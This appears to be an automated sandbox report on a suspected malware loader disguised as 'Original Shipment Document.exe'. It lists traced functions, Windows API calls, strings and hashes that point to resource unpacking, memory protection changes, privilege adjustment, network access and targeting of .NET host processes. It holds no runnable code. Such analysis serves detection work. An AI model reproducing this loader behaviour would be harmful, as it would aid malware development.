TerminateThread.KERNEL32(000000FE,00000000), ref: 00560DC1

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Thread$CreateTerminate
String ID:
API String ID: 1265538591-0
Opcode ID: e8f20dc6ef64f5f89e542afa9988093056f6cfc7661e208b5773496eea6d518b
Instruction ID: 46cc36eacc21f4af5ae90ba4032953d387e303daabfb309bd6b143f7d8a7187c
Opcode Fuzzy Hash: e8f20dc6ef64f5f89e542afa9988093056f6cfc7661e208b5773496eea6d518b
Instruction Fuzzy Hash: 2DE0673726910A65D7B046C0DF4EFEB736C6B01765FD80A81FA6BA4EC1BE60A3045973

Uniqueness

Uniqueness Score: -1.00%

Function 0056163D, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0056223D: LoadLibraryA.KERNEL32(?,8802EDAC,?,005625BF,0056010D,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF,00000000), ref: 00562287

Part of subcall function 005616D0: InternetOpenA.WININET(00561AEB,00000000,00000000,00000000,00000000,00560229,?,?,?,?,?,?,?,005600B8), ref: 00561709
Part of subcall function 005616D0: InternetOpenUrlA.WININET(?,0000009C,00000000,00000000,84000100,00000000,?,?,?,?,00000004), ref: 0056176B

LdrInitializeThunk.NTDLL(?,00561585,?,00560229,?,?,?,?,?,?,?,005600B8), ref: 00561B51

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 3f37fff17c92ded46075cbb19c3161db17dd2f0e8848fc1ddd81dffdadaadefe
Instruction ID: e81ba1a464822bdc83b607c27c3b6ebfd8bc2906928b967ffed73f386f86a2e0
Opcode Fuzzy Hash: 3f37fff17c92ded46075cbb19c3161db17dd2f0e8848fc1ddd81dffdadaadefe
Instruction Fuzzy Hash: 0141E1315097C58EC7329BB0896D6EA3FA4BF42310F5C85CED4854B663DB205A06D7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00561AEA, Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,00561585,?,00560229,?,?,?,?,?,?,?,005600B8), ref: 00561B51

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3898fe78a01e828bae0903bc59dec2e849d8d97af52d79237d40f24cf88ea45d
Instruction ID: df2aa3403b08f13cdc5ea30c05f54d8b2172e65aabf60cf41f25e65885870e59
Opcode Fuzzy Hash: 3898fe78a01e828bae0903bc59dec2e849d8d97af52d79237d40f24cf88ea45d
Instruction Fuzzy Hash: EA01DC3111F7D199C7228B3086AA593BFB0BE53200B2CD0DDC4C10A077C2A19A22EBDB

Uniqueness

Uniqueness Score: -1.00%

Function 0056223D, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,005625BF,0056010D,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF,00000000), ref: 00562287

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ad3cf964d7f8c2832756742cfecb1aaef0addd00bf87b9cf443deca23c9377eb
Instruction ID: d66e6201ca1fae9912e8f4f4e873878182d89aac8572d699a9531cb002880848
Opcode Fuzzy Hash: ad3cf964d7f8c2832756742cfecb1aaef0addd00bf87b9cf443deca23c9377eb
Instruction Fuzzy Hash: 90E026E489490B38CE783F205CACFBF3E15FBAA322F10BF10F45087012CA28C8448552

Uniqueness

Uniqueness Score: -1.00%

Function 00561562, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00560229,80000000,?,00000000,00000003,00000000,00000000,0056153F,00561589,00560229), ref: 0056157B

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7cce4cc99eda0915bc009925dd7bb4b16bc6e30f364a1a713d30ee3bafaf2e3b
Instruction ID: d717f65ad30c15f52abe3db3f63261360ce047bed68822192e92e541db7257d9
Opcode Fuzzy Hash: 7cce4cc99eda0915bc009925dd7bb4b16bc6e30f364a1a713d30ee3bafaf2e3b
Instruction Fuzzy Hash: 8FC04CB27D4301BAF63586148D16FC67116ABD0F04F108508B7092E1C047F16610C526

Uniqueness

Uniqueness Score: -1.00%

Function 0056236E, Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00560B72,00000000,?,?,00000014,?,?,00000014), ref: 00562373

Memory Dump Source

Source File: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa3998e71523d552c50a78f5615f0fc1702f2824ec24e47c9aad7bc1152a6c12
Instruction ID: 05020e435effe6aa703c28ee581f37e66afdd292f4a4428265fb15d0369698e6
Opcode Fuzzy Hash: fa3998e71523d552c50a78f5615f0fc1702f2824ec24e47c9aad7bc1152a6c12
Instruction Fuzzy Hash: 6AB0027541025ABF8F265F90DAAC9DF3F26FF4A352B009C40BD1994110C7358565EB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Original Shipment Document.exe PID: 1848 Parent PID: 5240 Original Shipment Document.exeCOMMON

Executed Functions

Function 04CFE20F, Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

ayX, xrefs: 04CFE6CC

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID: ayX
API String ID: 0-4067237522
Opcode ID: 866c0b02d89147e82ba5f84fd481ed0c9ace0681f72bfa0c356ae99689990f9f
Instruction ID: 09a91fd2043b37d3f9609a53c89e7c43140a1e58861a16113fb7c9000cc6a8a9
Opcode Fuzzy Hash: 866c0b02d89147e82ba5f84fd481ed0c9ace0681f72bfa0c356ae99689990f9f
Instruction Fuzzy Hash: 9932C734B04214CBD7A4DB79CD5476DBBB3AB84304F1488AAD606EB3A4EB39ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 053702C3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05370343

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 35e735a5a24041dd40acc16f78b8306625827e83106f66ce1436ab10add04ef1
Instruction ID: 9736f6b7213fe1a9d67c1a1c192b7d351c98eb3b7fdf9306abc1e974864872cd
Opcode Fuzzy Hash: 35e735a5a24041dd40acc16f78b8306625827e83106f66ce1436ab10add04ef1
Instruction Fuzzy Hash: 8921A1765097849FEB22CF25DC44F52BFB4FF06210F0885EAE9858F563D275A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05370445, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 053704B1

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: aa06f0f5e51d5bd57ae54e470c8c6ec7d19a8286c5417cf8b4b20716e7bee5a1
Instruction ID: 0c06bfb7eb090131161fa127a4c7d5628cfaed7071b152228c219a89ad9b3aa5
Opcode Fuzzy Hash: aa06f0f5e51d5bd57ae54e470c8c6ec7d19a8286c5417cf8b4b20716e7bee5a1
Instruction Fuzzy Hash: 181190724097C49FDB228F14DC45E52FFB4EF06314F0984DAE9845F163D275A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 053702FA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05370343

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 1f709210eed504289bc86049f7379553f504db01dff8ece2a94fc65e22b793dd
Instruction ID: e7cf2e3ad0ffefdc38cb091ef4063ea039b9e7344c3e0b14501018facdd161d8
Opcode Fuzzy Hash: 1f709210eed504289bc86049f7379553f504db01dff8ece2a94fc65e22b793dd
Instruction Fuzzy Hash: 591170759002049FEB21CFA5D884B66FBE5FF04220F0884AAED498B652D375E414CF61

Uniqueness

Uniqueness Score: -1.00%

Function 023AA5A2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E94,?,?), ref: 023AA5F2

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7e2e3bbdc2d5602cca2fd0a78d582dc57b3ba653939c3de515420fcab6d26dc9
Instruction ID: 8a24d0c4f74cef3dd6399691b1b7f0b79d638279ddc53c0a198ae32c84ae8b49
Opcode Fuzzy Hash: 7e2e3bbdc2d5602cca2fd0a78d582dc57b3ba653939c3de515420fcab6d26dc9
Instruction Fuzzy Hash: 6A01A271500200ABD310DF1ADC86F22FBE4FB88B20F148159ED084BB45E635F916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 023AA186, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 023AA1C1

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 30944a098c931a5753c013bf635304e9a819a285117cb2790854101cbce1b106
Instruction ID: 080d7d613e7e15b904b6b4053a631d71ebf45f164b2f29d5c8acab8212956816
Opcode Fuzzy Hash: 30944a098c931a5753c013bf635304e9a819a285117cb2790854101cbce1b106
Instruction Fuzzy Hash: E50171728042409FDB20CF55D884B56FFB4FF44720F08C4AADD594B652D375A459CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05370476, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 053704B1

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0cc35a868bfc434fca39aa31f2667cd5ff0099bd2779ebd278ace85b00f91815
Instruction ID: 9dc90fcff6b1085e63e0f80a940ee938dc12cfe52502262b2fc20023fd03601a
Opcode Fuzzy Hash: 0cc35a868bfc434fca39aa31f2667cd5ff0099bd2779ebd278ace85b00f91815
Instruction Fuzzy Hash: C301A2758006449FDB30CF15D888B22FFA5FF44720F08C49AEE995B652D279A418CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00452159, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00452186

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 1475b7d80cdc883f1e4e93e05a1a0d59bc7173cab4b9402b16cc79d67ba08d0a
Instruction ID: 2d60cd467bcfff31e4db8e981cb342e96e970a5ed9141f9cf74594921bbda3ad
Opcode Fuzzy Hash: 1475b7d80cdc883f1e4e93e05a1a0d59bc7173cab4b9402b16cc79d67ba08d0a
Instruction Fuzzy Hash: 81F0AF36100209ABCF119F85EC00D9B3B79FB5A362B08003AFF4493222DB35D825CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 04CFE897, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46556a86876acdb1e4b74622395ea240776039e5c1365cb8cc0ccb47d44620fb
Instruction ID: b8bef7cc00a59449ae78122131bf6c078701d0a246975413f8e7f29855fe5678
Opcode Fuzzy Hash: 46556a86876acdb1e4b74622395ea240776039e5c1365cb8cc0ccb47d44620fb
Instruction Fuzzy Hash: 6D91BE34A04254CFD7A4DB28CD44B5DBBF3AB44304F0588EAD10AAB2A5DB79EE84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCF0F, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868713d38d533b741f95bcedb39e1b152bdf84b06998c60ad58238aa74cf4b1e
Instruction ID: e210d4dee6cbce5a6e2185a01e62fd629b0d75e9df308626bb331f7137c81b87
Opcode Fuzzy Hash: 868713d38d533b741f95bcedb39e1b152bdf84b06998c60ad58238aa74cf4b1e
Instruction Fuzzy Hash: 11617E35F041199FCB54CFA9D9816AEFBB7FF88700F15851AE902BB350DA34AD069B90

Uniqueness

Uniqueness Score: -1.00%

Function 04CFE92B, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44dc2499f1a40bea9dbf8c50c826837975dfaaa8518982131b217353fd4fffb9
Instruction ID: e2a4d36fbc89d9cd2c7f1ecbf73d04554ab0ffea15c7fd1594fb5b480155ebbd
Opcode Fuzzy Hash: 44dc2499f1a40bea9dbf8c50c826837975dfaaa8518982131b217353fd4fffb9
Instruction Fuzzy Hash: 2D718E30A04254CFD7A4DB68CD44B5DBBF3AB41304F0584EAD10AAB2A5DB79EE89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CFD342, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab7706d01590402becd83058ea2281316f7e2e5f229e8b68ae229edef1c8b85
Instruction ID: c5a6b753f80342571c7e7e51290ea9a299a6d92d3e84ad08f9d71c30acf5bbbd
Opcode Fuzzy Hash: 0ab7706d01590402becd83058ea2281316f7e2e5f229e8b68ae229edef1c8b85
Instruction Fuzzy Hash: CF41D8B0F141559BDB98DB79DC547AE7BA7AFC8300F144425E607EB384EE38AC019751

Uniqueness

Uniqueness Score: -1.00%

Function 004514F3, Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00451599
LoadLibraryW.KERNEL32(?), ref: 004515F1
LoadLibraryW.KERNEL32(004542D4), ref: 004515FA

Strings

mscoree.dll, xrefs: 00451551
iphlpapi.dll, xrefs: 0045152E
diasymreader.dll, xrefs: 0045154A
mscorjit.dll, xrefs: 0045156D
advapi32.dll, xrefs: 00451535
ole32.dll, xrefs: 00451543
mscorwks.dll, xrefs: 00451512
mscorrc.dll, xrefs: 00451574
mscorsec.dll, xrefs: 00451558
user32.dll, xrefs: 00451527
sxs.dll, xrefs: 00451519
Gdiplus.dll, xrefs: 0045153C
mscordacwks.dll, xrefs: 0045155F
shfolder.dll, xrefs: 00451520
Culture.dll, xrefs: 00451566

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: LibraryLoad$_memset
String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
API String ID: 240438931-1803115895
Opcode ID: 0018c757dc60ef3cb1743398ecb986f0ee3c62bc321095251455acf506b9535a
Instruction ID: d7551cd65e2595defa8302f554c54aa5e70679d1bcf0741d99cf5b691e75b81f
Opcode Fuzzy Hash: 0018c757dc60ef3cb1743398ecb986f0ee3c62bc321095251455acf506b9535a
Instruction Fuzzy Hash: 8631417180021DABCF11DF98D9486DEB7B4EF8530AF108156E906AF202D3745A8DDF98

Uniqueness

Uniqueness Score: -1.00%

Function 004527C7, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 187memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00452039: GetModuleHandleW.KERNEL32(00000000), ref: 00452042
Part of subcall function 00452039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00452056
Part of subcall function 00452039: SizeofResource.KERNEL32(00000000,00000000), ref: 00452064
Part of subcall function 00452039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0045207B
Part of subcall function 00452039: LoadResource.KERNEL32(00000000,00000000), ref: 00452085

Part of subcall function 00451ED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00451F04

GetModuleHandleA.KERNEL32(00000000), ref: 00452848
VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00452868

Part of subcall function 00451F82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00451FAD

_memset.LIBCMT ref: 0045289F

Part of subcall function 00451834: _memset.LIBCMT ref: 00451869

_memset.LIBCMT ref: 004528F7
PathFileExistsW.SHLWAPI(?), ref: 00452919
_memset.LIBCMT ref: 00452945
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0045297B
GetFileSize.KERNEL32(00000000,00000000), ref: 0045299D
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Original Shipment Document.exe,00000104), ref: 004529DA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Original Shipment Document.exe,00000104), ref: 004529E7
CloseHandle.KERNEL32 ref: 00452A54

Strings

C:\Users\user\Desktop\Original Shipment Document.exe, xrefs: 004529CF
C:\Users\user\Desktop\Original Shipment Document.exe, xrefs: 004529E1

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
String ID: C:\Users\user\Desktop\Original Shipment Document.exe$C:\Users\user\Desktop\Original Shipment Document.exe
API String ID: 3419322617-536087042
Opcode ID: ea135f57d73da29d0929840ade230bca3f0acd24d97dcc8c38f1f8b4e0fb6b84
Instruction ID: cbd5fa28e1fddb0c053fb928253f604d9d2f1cd38047b53760f27f827cd65d7a
Opcode Fuzzy Hash: ea135f57d73da29d0929840ade230bca3f0acd24d97dcc8c38f1f8b4e0fb6b84
Instruction Fuzzy Hash: 55618371A00219AFDF30AB61ED85B9B37E8AB05307F14147BE905E2253D7B89E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00451B12, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 165fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00451B32
_memset.LIBCMT ref: 00451B98

Strings

mscoree.dll, xrefs: 00451BEA
clr.dll, xrefs: 00451C25
C:\Users\user\Desktop\Original Shipment Document.exe, xrefs: 00451B4E
mscorwks.dll, xrefs: 00451C93
WINTRUST.dll, xrefs: 00451BAF
mscoreei.dll, xrefs: 00451C5C

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: CreateFile_memset
String ID: C:\Users\user\Desktop\Original Shipment Document.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
API String ID: 3830271748-3130806308
Opcode ID: c8cad98f9664456d75150a0e786fde88c400eebb921f14706bfa6c9b1c37f6e8
Instruction ID: 90e64750c256e9a38a217cc4d341340e83a2bafbe7ab9955b41db1c5d61b30b2
Opcode Fuzzy Hash: c8cad98f9664456d75150a0e786fde88c400eebb921f14706bfa6c9b1c37f6e8
Instruction Fuzzy Hash: 5851B45175011296CB22AF64CC41BF33266AF30B96B8446A6DC45CB377F72BDD8AC358

Uniqueness

Uniqueness Score: -1.00%

Function 004516F4, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0045171D
_memset.LIBCMT ref: 00451744
RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0045176D
_memset.LIBCMT ref: 0045178B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00458000,000000FF,?,00000104), ref: 004517A9
RegCloseKey.KERNEL32(00000000), ref: 00451829

Strings

Software\Microsoft\.NETFramework, xrefs: 0045170D
InstallRoot, xrefs: 0045175D

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
String ID: InstallRoot$Software\Microsoft\.NETFramework
API String ID: 3047945766-4217373442
Opcode ID: 06aac47e6bd9917c3d406c2fa2f18292417c0b4df8c57cc27ecb57420e276534
Instruction ID: 81433f9234f491a39452369fced7f64c1e6521d21584d841755182145e4c72a1
Opcode Fuzzy Hash: 06aac47e6bd9917c3d406c2fa2f18292417c0b4df8c57cc27ecb57420e276534
Instruction Fuzzy Hash: 3131D672A00219ABCB209B998C45BEFB7F8EF44B55F1441A7F905E3291E7744E48CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045160E, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00451660
PathFileExistsW.SHLWAPI(?), ref: 004516B8

Strings

RegAsm.exe, xrefs: 0045162E
jsc.exe, xrefs: 00451627
RegSvcs.exe, xrefs: 00451643
dfsvc.exe, xrefs: 00451635
CasPol.exe, xrefs: 0045163C

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ExistsFilePath_memset
String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
API String ID: 4214796376-2149642370
Opcode ID: 0a6fd08e535ef0e8b772e55f3b85349b3ba0cc23775e5bcf3c710162e83a5081
Instruction ID: d4ac0fcad89e6cb75a0c18b30645e2b75506d2c560871ed06bb0a8d606410b25
Opcode Fuzzy Hash: 0a6fd08e535ef0e8b772e55f3b85349b3ba0cc23775e5bcf3c710162e83a5081
Instruction Fuzzy Hash: 01218631A00209ABCF10DFA8D4946BE77B4EF4534AF0045A6EC46DB212E7748E99DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04CF002B, Relevance: 11.2, Instructions: 11246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0d941c90aa0769a3a6a0f22b35ab227dca6d9140a86d0000548359cdf918f6
Instruction ID: acdfbca4f8e3c666a92c0524870468c42fdd2c7a36a1d096c6053d0ade94874f
Opcode Fuzzy Hash: fd0d941c90aa0769a3a6a0f22b35ab227dca6d9140a86d0000548359cdf918f6
Instruction Fuzzy Hash: 6D248274A006488FD374DB29C8187AF7AD3FBC5300F558869898A1F7D1CB79AE42DB52

Uniqueness

Uniqueness Score: -1.00%

Function 004521BE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004521FD

Part of subcall function 0045189E: GetCurrentProcess.KERNEL32 ref: 004518AB
Part of subcall function 0045189E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004518C5
Part of subcall function 0045189E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004518FD
Part of subcall function 0045189E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00451929

Strings

CRYPT32.dll, xrefs: 00452253
clr.dll, xrefs: 0045228F
mscoree.dll, xrefs: 004522FF
imagehlp.dll, xrefs: 00452216
mscoreei.dll, xrefs: 004522C7

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
API String ID: 1620000358-1444991907
Opcode ID: 800094bed8e16606fad7e809f898f21c68b9c540f4f7cda880b04857bbc6476f
Instruction ID: df31fb5b94d8af6eeff57b89edba94619f30477c95089cc768363db441ba42d5
Opcode Fuzzy Hash: 800094bed8e16606fad7e809f898f21c68b9c540f4f7cda880b04857bbc6476f
Instruction Fuzzy Hash: DE41DB1560011295CB10AF34CE016F732629F32BA5F8443A3EC55CB3A7F76BCE89C294

Uniqueness

Uniqueness Score: -1.00%

Function 00451D94, Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00451D9D

Part of subcall function 0044B04F: __FF_MSGBANNER.LIBCMT ref: 0044B072
Part of subcall function 0044B04F: __NMSG_WRITE.LIBCMT ref: 0044B079
Part of subcall function 0044B04F: RtlAllocateHeap.NTDLL(00000000,?), ref: 0044B0C6

VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 00451DB4
VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00451DC2
_memset.LIBCMT ref: 00451E03
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 00451E14
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 00451E1C
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 00451E23

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
String ID:
API String ID: 851286602-0
Opcode ID: 2f9313006d1017cc354b868792323d6c0469c0b012df8390411c5050e7bde094
Instruction ID: bf5c97d2981df7959b1ffd26e04eba38cdd339ac768e49c37b4adf487e67ebaf
Opcode Fuzzy Hash: 2f9313006d1017cc354b868792323d6c0469c0b012df8390411c5050e7bde094
Instruction Fuzzy Hash: 86218372600304AFD710DFA9DD89DAA7BBCEB05742B42457AF606C7193E734D608CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00452039, Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00452042
FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00452056
SizeofResource.KERNEL32(00000000,00000000), ref: 00452064
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0045207B
LoadResource.KERNEL32(00000000,00000000), ref: 00452085
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004520AC

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
String ID:
API String ID: 3588284000-0
Opcode ID: 1e4d27ff5813f1273a4728c116948f0f43323446d615c8e6bd96cf7e4d24bde8
Instruction ID: 66528e8f26c24a02c78d341c6a40f8077659886bf2e19dcde3d17bbd08935161
Opcode Fuzzy Hash: 1e4d27ff5813f1273a4728c116948f0f43323446d615c8e6bd96cf7e4d24bde8
Instruction Fuzzy Hash: D301A2717423007BE2722B655D49F2F366CAB46F97F100032FF01E52C2EAA4CE04827A

Uniqueness

Uniqueness Score: -1.00%

Function 004523B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004523D2

Part of subcall function 0045189E: GetCurrentProcess.KERNEL32 ref: 004518AB
Part of subcall function 0045189E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004518C5
Part of subcall function 0045189E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004518FD
